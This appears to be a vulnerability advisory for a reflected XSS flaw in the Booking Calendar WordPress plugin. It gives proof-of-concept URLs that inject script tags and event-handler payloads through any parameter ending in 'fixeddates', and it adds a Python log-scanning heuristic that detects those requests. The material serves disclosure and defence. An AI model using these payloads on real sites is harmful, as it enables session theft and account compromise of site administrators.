Booking Calendar [Reflected XSS]

Description

This is a typical reflected XSS vulnerability. The vulnerable parameter is $_REQUEST['*fixeddates']: the parameter name can be any value as long as it ends with the fixeddates suffix.

For the injected value to be reflected, $_REQUEST['view_mode'] must not be equal to vm_calendar.

PoC

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&wpdevbk_idfixeddates="><script>alert(/XSS/)</script>

Using arbitrary characters in front of the fixeddates suffix:

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&arbitrary_chars_0039--237651OOOfixeddates="><script>alert(/XSS/)</script>

Using HTML event handlers instead of a script tag:

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&fixeddates="><img src=a onerror=alert(/XSS/) />

http://sbwp4.dev/wp-admin/admin.php
?page=booking/wpdev-booking.phpwpdev-booking
&view_mode=default
&fixeddates=" onmouseover=alert(/XSS/)//
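The following detection heuristic is an added example, not part of the original advisory: it scans constructed access-log lines in combined log format for requests to wp-admin/admin.php carrying any parameter whose name ends in fixeddates and whose value contains attribute-breakout characters, and records whether view_mode is vm_calendar (where, per the advisory, the value is not reflected). The path filter, the breakout character set and the log format are assumptions of this example.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Characters that can close an HTML attribute value or open a tag (heuristic).
BREAKOUT = re.compile(r'["\'<>]')

# Minimal combined-log-format matcher (assumed log layout).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def inspect_request(target: str) -> Optional[dict]:
    """Return a finding for one request target, or None if nothing is suspicious."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qsl percent-decodes values, so encoded payloads are inspected as sent to PHP.
    params = parse_qsl(parts.query, keep_blank_values=True)
    view_mode = dict(params).get("view_mode", "")
    hits = [k for k, v in params if k.endswith("fixeddates") and BREAKOUT.search(v)]
    if not hits:
        return None
    return {
        "params": hits,
        "view_mode": view_mode,
        # Advisory: the value is only reflected when view_mode != vm_calendar.
        "reflected_view": view_mode != "vm_calendar",
    }

def scan_log(lines):
    """Run inspect_request over each parsable log line; return the findings in order."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = inspect_request(m.group("target"))
        if finding:
            finding["ip"] = m.group("ip")
            findings.append(finding)
    return findings

# Constructed sample log lines (not real traffic); payloads are the advisory's PoC, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&view_mode=default&wpdevbk_idfixeddates=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E HTTP/1.1" 200 1234',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&view_mode=default&wpdevbk_idfixeddates=2024-01-05 HTTP/1.1" 200 1234',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&view_mode=vm_calendar&fixeddates=%22%20onmouseover%3Dalert(/XSS/)// HTTP/1.1" 200 1234',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?fixeddates=%3Cb%3E HTTP/1.1" 200 1234',
]
```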
